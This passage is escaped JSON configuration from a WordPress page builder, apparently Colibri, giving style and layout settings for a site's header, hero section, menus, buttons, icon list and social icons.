"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"22-h67\"]},{\"id\":198,\"type\":\"hop-logo\",\"props\":{\"horizontalTextAlign\":\"left\",\"media\":{\"mobile\":{\"horizontalTextAlign\":\"left\"}}},\"v\":\"1.1\",\"nodes\":[\"22-h68\"]},{\"id\":199,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"descendants\":{\"outer\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"22-h6\"]},{\"id\":200,\"type\":\"hop-spacer\",\"v\":\"1.1\",\"nodes\":[\"22-h7\"]},{\"id\":201,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"textAlign\":\"center\",\"media\":{\"mobile\":{\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"22-h70\"]},{\"id\":202,\"type\":\"hop-horizontal-menu\",\"style\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.0|variant3}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\",\"media\":{\"mobile\":{\"justifyContent\":\"center\"}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"props\":{\"hoverEffect\":{\"type\":\"bordered-active-item bordered-active-item--bottom\",\"activeGroup\":\"border\"}},\"v\":\"1.1\",\"nodes\":[\"22-h71\"]},{\"id\":203,\"type\":\"hop-mobile-menu\",\"v\":\"1.1\",\"nodes\":[\"22-h72\"]},{\"id\":204,\"type\":\"hop-offscreen-panel\",\"v\":\"1.1\",\"nodes\":[\"22-h73\"]},{\"id\":205,\"style\":{\"descendants\":{\"link\":{\"typography\":{\"color\":\"white\"}},\"submenu-item-link\":{\"typography\":{\"color\":\"white\"}},\"iconOption\":{\"typography\":{\"color\":\"white\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"white\"}}}},\"props\":{\"layout\":\"accordion\"},\"type\":\"hop-accordion-menu\",\"v\":\"1.1\",\"nodes\":[\"22-h74\"]},{\"id\":206,\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"22-h75\"]},{\"id\":207,\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"22-h76\"]},{\"id\":208,\"type\":\"hop-logo\",\"v\":\"1.1\",\"nodes\":[\"22-h77\"]},{\"id\":209,\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"22-h78\"]},{\"id\":210,\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"22-h79\"]},{\"id\":211,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"22-h80\"]},{\"id\":212,\"style\":{\"typography\":{\"holders\":{\"h1\":{\"color\":\"${theme.colors.4}\"},\"h2\":{\"color\":\"${theme.colors.4}\"},\"h3\":{\"color\":\"${theme.colors.4}\"},\"h4\":{\"color\":\"${theme.colors.4}\"},\"h5\":{\"color\":\"${theme.colors.4}\"},\"h6\":{\"color\":\"${theme.colors.4}\"},\"p\":{\"color\":\"${theme.colors.4}\"}}},\"background\":{\"type\":\"image\",\"overlay\":{\"enabled\":true,\"type\":\"color\",\"gradient\":{\"angle\":\"-20\",\"steps\":[{\"color\":\"rgba(183, 33, 255, 0.8)\",\"position\":\"0\"},{\"color\":\"rgba(33, 212, 253, 0.8)\",\"position\":\"100\"}]},\"shape\":{\"value\":\"circles-2\",\"isTile\":false},\"color\":{\"value\":\"rgb(212, 211, 225)\",\"opacity\":\"0.5\"},\"light\":0},\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-cropped-header-scaled-1.jpg\"},\"position\":{\"x\":48.828125,\"y\":48.69319869319869}}],\"video\":{\"internalUrl\":\"http:\\/\\/gabi.extendstudio.net\\/header3-freefree\\/wp-content\\/uploads\\/2019\\/06\\/Photography-21188.mp4\",\"internalVideoMime\":\"video\\/mp4\",\"videoType\":\"external\",\"externalUrl\":\"\"},\"color\":\"\"},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"150\",\"path\":\"value\"},\"bottom\":{\"unit\":\"px\",\"value\":\"150\",\"path\":\"value\"}},\"customHeight\":{\"type\":\"full-screen\",\"min-height\":{\"unit\":\"px\",\"value\":758.40625}},\"media\":{\"mobile\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/colibri-image-298.png\"}}]}}},\"separatorBottom\":{\"enabled\":true,\"height\":{\"unit\":\"px\",\"value\":121},\"color\":\"white\",\"type\":\"watercolor\",\"negative\":false},\"separatorTop\":{\"enabled\":true,\"height\":{\"unit\":\"px\",\"value\":165},\"color\":\"white\",\"type\":\"brush strokes\",\"negative\":false}},\"props\":{\"heroSection\":{\"layout\":\"textWithMediaOnRight\",\"mediaType\":\"hop-image\"},\"attrs\":{\"name\":\"hero\",\"id\":\"hero\"},\"width\":\"boxed\",\"verticalAlign\":\"center\",\"downArrow\":{\"enabled\":false}},\"type\":\"hop-hero\",\"v\":\"1.1\",\"nodes\":[\"22-h24\"]},{\"id\":213,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":3,\"verticalInnerGap\":3}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"22-h25\"]},{\"id\":214,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"radius\":{\"left\":{\"value\":\"9\",\"unit\":\"px\"},\"right\":{\"value\":\"9\",\"unit\":\"px\"}}},\"right\":{\"style\":\"solid\"},\"bottom\":{\"style\":\"solid\",\"radius\":{\"left\":{\"value\":\"9\",\"unit\":\"px\"},\"right\":{\"value\":\"9\",\"unit\":\"px\"}}},\"left\":{\"style\":\"solid\"}},\"textAlign\":\"center\",\"media\":{\"tablet\":{\"textAlign\":\"center\"},\"mobile\":{\"textAlign\":\"center\"}}},\"v\":\"1.1\",\"nodes\":[\"22-h26\"]},{\"id\":215,\"props\":{\"headerType\":\"3\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"22-h27\"],\"style\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"\"},\"weight\":\"600\"}}},{\"id\":216,\"props\":{\"type\":\"lead\"},\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"22-h28\"],\"style\":{\"typography\":{\"holders\":{\"p\":{\"color\":\"${theme.colors.5}\"}}}}},{\"id\":217,\"type\":\"hop-button-group\",\"v\":\"1.1\",\"nodes\":[\"22-h31\"]},{\"id\":218,\"style\":{\"background\":{\"color\":\"${theme.colors.0}\",\"type\":\"none\",\"image\":[{\"source\":{\"type\":\"gradient\",\"gradient\":{\"angle\":\"0\",\"steps\":[{\"color\":\"#00c6fb\",\"position\":\"0\"},{\"color\":\"#005bea\",\"position\":\"100\"}]}}}]},\"typography\":{\"color\":\"white\",\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"transform\":\"uppercase\",\"lineHeight\":{\"value\":\"1\",\"unit\":\"\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"12\"},\"bottom\":{\"unit\":\"px\",\"value\":\"12\"},\"left\":{\"unit\":\"px\",\"value\":\"24\"},\"right\":{\"unit\":\"px\",\"value\":\"24\"}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"textAlign\":\"center\",\"boxShadow\":{\"enabled\":false}},\"type\":\"hop-button\",\"props\":{\"buttonSize\":\"medium\",\"buttonWidth\":\"fitToContent\"},\"v\":\"1.1\",\"nodes\":[\"22-h32\"]},{\"id\":219,\"style\":{\"background\":{\"color\":\"transparent\"},\"typography\":{\"color\":\"white\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"600\",\"transform\":\"uppercase\",\"lineHeight\":{\"value\":\"1\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"}},\"border\":{\"top\":{\"color\":\"white\",\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"color\":\"white\",\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"white\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"color\":\"white\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"},\"left\":{\"unit\":\"px\",\"value\":\"30\"},\"right\":{\"unit\":\"px\",\"value\":\"30\"}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(255, 255, 255, 0.2)\"},\"border\":{\"top\":{\"color\":\"${theme.colors.4}\"},\"left\":{\"color\":\"${theme.colors.4}\"},\"right\":{\"color\":\"${theme.colors.4}\"},\"bottom\":{\"color\":\"${theme.colors.4}\"}}}},\"textAlign\":\"center\"},\"type\":\"hop-button\",\"props\":{\"buttonSize\":\"large\"},\"v\":\"1.1\",\"nodes\":[\"22-h57\"]},{\"id\":220,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"22-h29\"],\"style\":{\"background\":{\"color\":\"${theme.colors.5}\"}}},{\"id\":221,\"type\":\"hop-image\",\"v\":\"1.1\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"10\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"opacity\":{\"value\":1},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0,0,0,0.5)\"}]}},\"overlay\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"10\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"background\":{\"overlay\":{\"enabled\":false,\"color\":{\"value\":\"${theme.colors.1}\"},\"type\":\"gradient\"}}},\"frameImage\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"10\",\"unit\":\"px\",\"path\":\"value\"},\"color\":\"${theme.colors.1}\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"10\",\"unit\":\"px\",\"path\":\"value\"},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"10\",\"unit\":\"px\",\"path\":\"value\"},\"color\":\"${theme.colors.1}\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"10\",\"unit\":\"px\",\"path\":\"value\"},\"color\":\"${theme.colors.1}\"}},\"backgroundColor\":\"${theme.colors.1}\",\"zIndex\":-1,\"transform\":{\"translate\":{\"x\":{\"path\":\"value\",\"value\":\"7\"},\"y\":{\"path\":\"value\",\"value\":-8}}},\"height\":{\"path\":\"value\",\"value\":\"120\"},\"width\":{\"path\":\"value\",\"value\":100}}}},\"props\":{\"enabledFrameOption\":true,\"frame\":{\"type\":\"background\"},\"showFrameOverImage\":false,\"showFrameShadow\":true},\"nodes\":[\"22-h30\"]},{\"id\":222,\"type\":\"hop-down-arrow\",\"v\":\"1.1\",\"props\":{\"type\":\"icon\"},\"style\":{\"bottom\":{\"value\":\"20\"}},\"nodes\":[\"22-h31\"]},{\"id\":223,\"type\":\"hop-down-arrow-scroll-button-group\",\"v\":\"1.1\",\"nodes\":[\"22-h32\"]},{\"id\":224,\"type\":\"hop-down-arrow-scroll-button\",\"style\":{\"textAlign\":\"center\",\"background\":{\"color\":\"${theme.colors.0}\"},\"typography\":{\"color\":\"#fff\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"lineHeight\":{\"value\":\"1\",\"unit\":\"\"},\"transform\":\"uppercase\",\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"}},\"border\":{\"top\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"bottom\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"12\"},\"bottom\":{\"unit\":\"px\",\"value\":\"12\"},\"left\":{\"unit\":\"px\",\"value\":\"24\"},\"right\":{\"unit\":\"px\",\"value\":\"24\"}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"props\":{\"buttonSize\":\"medium\",\"buttonWidth\":\"fitToContent\"},\"nodes\":[\"22-h33\"]},{\"id\":225,\"type\":\"hop-down-arrow-scroll-icon\",\"style\":{\"descendants\":{\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"40\"},\"height\":{\"path\":\"value\",\"value\":\"40\"},\"fill\":\"${theme.colors.4}\"}}},\"v\":\"1.1\",\"nodes\":[\"22-h34\"]},{\"id\":226,\"type\":\"hop-content\",\"nodeId\":\"20-c1\",\"nodes\":[\"20-c1\"],\"style\":[],\"v\":\"1.1\"},{\"id\":227,\"type\":\"hop-content\",\"nodeId\":\"20-c1\",\"nodes\":[\"20-c1\"],\"style\":[],\"v\":\"1.1\"},{\"id\":228,\"type\":\"hop-content\",\"nodeId\":\"20-c1\",\"nodes\":[\"20-c1\"],\"v\":\"1.1\"},{\"id\":229,\"type\":\"hop-top-bar\",\"props\":{\"width\":\"boxed\"},\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\",\"nodes\":[\"22-h32\"]},{\"id\":230,\"style\":{\"background\":{\"color\":\"black\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"fullBackground\":true,\"hide\":{\"mobile\":true}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"22-h33\"]},{\"id\":231,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"textAlign\":\"left\",\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\",\"nodes\":[\"22-h34\"]},{\"id\":232,\"type\":\"hop-icon-list\",\"style\":{\"descendants\":{\"li\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"divider\":{\"border\":{\"left\":{\"width\":{\"value\":1,\"unit\":\"px\"}},\"bottom\":{\"width\":{\"value\":0,\"unit\":\"px\"}}},\"height\":{\"value\":100,\"unit\":\"%\"}},\"containerDivider\":{\"height\":{\"value\":100,\"unit\":\"%\"},\"width\":{\"value\":1,\"unit\":\"px\"},\"padding\":{\"left\":{\"value\":10,\"unit\":\"px\"},\"top\":{\"value\":0,\"unit\":\"px\"},\"right\":{\"value\":10,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"18\"},\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"}}},\"height\":{\"path\":\"value\",\"value\":\"18\"},\"border\":{\"top\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\",\"path\":\"value\"}}},\"text\":{\"margin\":{\"left\":{\"path\":\"value\",\"value\":\"5\"}},\"color\":\"${theme.colors.4}\",\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"list-item\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}},\"horizontalAlign\":\"start\"}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #1\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.15907223444395013},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #2\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.34341111083051734},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #3\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.0941660601972718},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #4\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.5295691579821964}],\"iconAndTextAlign\":\"center\",\"listLayout\":\"horizontal\"},\"v\":\"1.1\",\"nodes\":[\"22-h35\"]},{\"id\":233,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\",\"nodes\":[\"22-h36\"]},{\"id\":234,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"0\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"props\":{\"horizontalAlign\":\"end\",\"media\":{\"mobile\":{\"horizontalAlign\":\"center\"}},\"hide\":{\"mobile\":false}},\"v\":\"1.1\",\"nodes\":[\"22-h37\"]},{\"id\":243,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"nodeId\":\"22-h69\",\"nodes\":[\"22-h69\"],\"v\":\"1.1\"},{\"id\":244,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":0,\"path\":\"value\"},\"bottom\":{\"unit\":\"px\",\"value\":0,\"path\":\"value\"}},\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":0},\"bottom\":{\"unit\":\"px\",\"value\":0}}},\"ancestor\":{\"sticky\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":10},\"bottom\":{\"unit\":\"px\",\"value\":10}},\"background\":{\"color\":\"#ffffff\"}}},\"background\":{\"color\":\"#ffffff\"}},\"type\":\"hop-navigation\",\"nodeId\":\"22-h81\",\"nodes\":[\"22-h2\"],\"v\":\"1.1\",\"props\":{\"sticky\":true,\"showTopBar\":false,\"overlap\":false}},{\"id\":245,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"fullBackground\":false,\"layout\":{\"equalWidth\":false,\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}}},\"type\":\"hop-row\",\"nodeId\":\"22-h82\",\"nodes\":[\"22-h3\"],\"v\":\"1.1\"},{\"id\":246,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"nodeId\":\"22-h83\",\"nodes\":[\"22-h4\"],\"v\":\"1.1\"},{\"id\":247,\"t